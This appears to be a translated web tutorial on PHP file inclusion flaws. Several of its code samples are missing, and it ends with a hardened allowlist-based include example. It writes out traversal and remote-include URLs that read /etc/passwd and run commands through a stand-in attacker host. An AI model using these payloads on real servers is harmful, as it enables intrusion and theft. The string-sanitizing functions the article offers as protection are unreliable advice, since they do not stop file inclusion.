
Example analysis of file inclusion vulnerability protection and common file-reading payloads

2025-02-25 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >


Shulou(Shulou.com)05/31 Report--

This article introduces file inclusion vulnerability protection with an example analysis of common file-reading payloads. It goes into considerable detail and should be a useful reference; interested readers are encouraged to read on.

For reference, study and use only

1. Security examples

Now look at the following code

Files

Clearly this should not be used as written. The $page variable is not sanitized at all: whatever the user supplies in $page is passed straight into the page, which is a serious mistake. Every input that arrives via the browser must be sanitized. When a user visiting the site clicks "Files" to open files.php, the following URL is requested.

http://localhost/index.php?page=files.php

Now, if the $page input variable is not sanitized, it can be abused to run commands of the attacker's choosing. If the host is a Unix/Linux server, the password file can be read with the URL below.

http://localhost/index.php?page=../../etc/passwd

The above URL will return /etc/passwd

Files

Now suppose we enter the url as follows

http://localhost/index.php?page=http://google.com/

Where the $page variable was originally rendered on the page, we now get the google.com home page instead. We all know what a c99 shell can do, and if the developers are not careful, such a shell can be included into the page, letting its users browse sensitive files. Let's look at some of the simpler things that might happen on the web. Now create a file called "test.php", put the following code in it, and save it.

This file can then be abused, because PHP's passthru() function is very dangerous. With this code in test.php, a request containing the file inclusion vulnerability can be sent to the web page, as shown in the following URL.

http://localhost/index.php?page=http://someevilhost.com/test.php

Because the code reads its command from a $_GET request, a parameter must be supplied to pass to passthru(). It can be typed into the URL like this.

http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd

The Unix machine will then read the file /etc/passwd using the cat command. Now we need to know how to control this: how to make it impossible for anyone to execute commands, and how to stop remote files from being included and executing commands on your server. We can disable the passthru() function. As mentioned earlier, we can sanitize the input, using some of the constructs PHP suggests for this purpose. To begin with, PHP adopted Perl's chop() function, which strips whitespace from its argument. We can use it like this.

Files

PHP has many functions that can sanitize strings, such as htmlspecialchars(), htmlentities(), stripslashes(), and so on. We can write a PHP function that sanitizes all of the input, as shown in the following code.

The str_replace() function can also be used here, and there are many other functions that can sanitize input.
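Sanitizing the string is only half of the fix; the safer pattern is to never let user input name a file at all. As an added example (not the article's own code), the following hardened replacement for an include() driven by ?page= maps the parameter to an allowlist and confines the resolved path to a fixed directory; the page names and the "pages/" directory are assumptions for illustration.

```php
<?php
// Added example (not from the article): hardened handling of ?page=.
// Assumed layout: index.php sits next to a "pages/" directory that holds
// home.php and files.php; nothing outside it may ever be included.

const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: the only ?page= values that are accepted, mapped to files.
// Anything else (../../etc/passwd, http://..., php://...) is not a key
// here and is refused before any filesystem or network access happens.
const ALLOWED_PAGES = [
    'home'  => 'home.php',
    'files' => 'files.php',
];

/**
 * Resolve the requested page to a file under PAGE_DIR, or null if the
 * request is not acceptable. Two independent checks are applied: the
 * name must be on the allowlist, and the resolved path must still lie
 * inside PAGE_DIR (defence in depth should the allowlist ever be edited).
 */
function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;                         // unknown page name, refuse
    }
    $real = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$requested]);
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false) {
        return null;                         // file or base directory missing
    }
    // Path containment: the resolved file must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

$page = (string) ($_GET['page'] ?? 'home');
$file = resolvePage($page);

if ($file === null) {
    http_response_code(404);
    // Rejected values are worth logging: they are a useful detection signal.
    error_log('Rejected page parameter: ' . $page);
    exit('Page not found');
}

include $file;
```

Keeping allow_url_include=Off and allow_url_fopen=Off in php.ini, and listing passthru in disable_functions, backs this up at the interpreter level even if a future code change reintroduces an unchecked include.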

That is the whole of the article "File inclusion vulnerability protection and example analysis of common file-reading payloads". Thank you for reading! We hope the content is helpful; for more related knowledge, follow the industry information channel.
